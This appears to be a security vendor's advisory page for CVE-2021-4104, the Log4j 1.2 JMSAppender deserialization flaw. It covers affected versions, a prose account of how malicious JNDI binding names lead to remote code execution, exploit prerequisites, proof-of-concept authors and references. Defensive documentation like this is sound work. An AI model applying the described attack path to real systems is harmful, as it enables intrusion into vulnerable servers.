CVE-2021-4104
Deserialization of Untrusted Data vulnerability in log4j:log4j
What is CVE-2021-4104 About?
JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data, enabling remote code execution (RCE) if an attacker can write to the Log4j configuration. This allows an attacker to provide malicious configurations that trigger JNDI requests, leading to RCE. Exploitation relies on specific configuration and write access.
Affected Software
- log4j:log4j
- >1.2.0, <=1.2.17
- org.zenframework.z8.dependencies.commons:log4j-1.2.17
- <=2.0
Technical Details
The JMSAppender in Apache Log4j 1.2 is susceptible to deserialization of untrusted data. This vulnerability occurs when an attacker has write access to the Log4j configuration file. The attacker can then modify the configuration to include malicious `TopicBindingName` and `TopicConnectionFactoryBindingName` values within the JMSAppender configuration. When Log4j processes this configuration, the JMSAppender will perform JNDI (Java Naming and Directory Interface) requests to resolve these binding names. If the attacker controls a remote JNDI server (e.g., an LDAP server), they can serve a malicious serialized Java object. The vulnerable Log4j instance, upon deserializing this object, can execute arbitrary code, similar to the Log4jShell vulnerability (CVE-2021-44228). This specific issue only affects Log4j 1.2 when JMSAppender is explicitly configured, which is not the default.
What is the Impact of CVE-2021-4104?
Successful exploitation may allow attackers to achieve remote code execution, leading to complete system compromise, data theft, or denial of service.
What is the Exploitability of CVE-2021-4104?
Exploitation of this deserialization vulnerability is of high complexity. A critical prerequisite is that the attacker must have write access to the Log4j configuration file of the target system. This typically implies prior unauthorized access or a local privilege escalation. Authentication to the application itself might not be directly required, but access to the filesystem is crucial. This can be a local or remote attack depending on how write access to the configuration is achieved. Special conditions include the use of Log4j 1.2 AND the explicit configuration of `JMSAppender`, which is not a default setting. Furthermore, the attacker needs to set up a malicious JNDI server. Risk factors that increase likelihood include shared hosting environments where configuration files are accessible and applications still running the end-of-life Log4j 1.2 with JMSAppender configured.
What are the Known Public Exploits?
| PoC Author | Link | Commentary |
|---|---|---|
| cckuailong | Link | log4j 1.x RCE Poc -- CVE-2021-4104 |
| cuijiung | Link | PoC for CVE-2021-4104 |
What are the Available Fixes for CVE-2021-4104?
Available Upgrade Options
- No fixes available
Struggling with dependency upgrades?
See how Resolved Security's drop-in replacements make it simple.
Book a demoAdditional Resources
- https://access.redhat.com/security/cve/CVE-2021-4104
- https://security.gentoo.org/glsa/202312-02
- https://github.com/apache/logging-log4j2
- https://github.com/apache/logging-log4j2/pull/608#issuecomment-990494126
- https://access.redhat.com/security/cve/CVE-2021-4104
- https://www.oracle.com/security-alerts/cpuapr2022.html
- https://security.gentoo.org/glsa/202312-02
- https://security.netapp.com/advisory/ntap-20211223-0007/
- https://security.gentoo.org/glsa/202209-02
- https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0033
What are Similar Vulnerabilities to CVE-2021-4104?
Similar Vulnerabilities: CVE-2021-44228 , CVE-2021-45046 , CVE-2021-45105 , CVE-2022-23302 , CVE-2022-23305
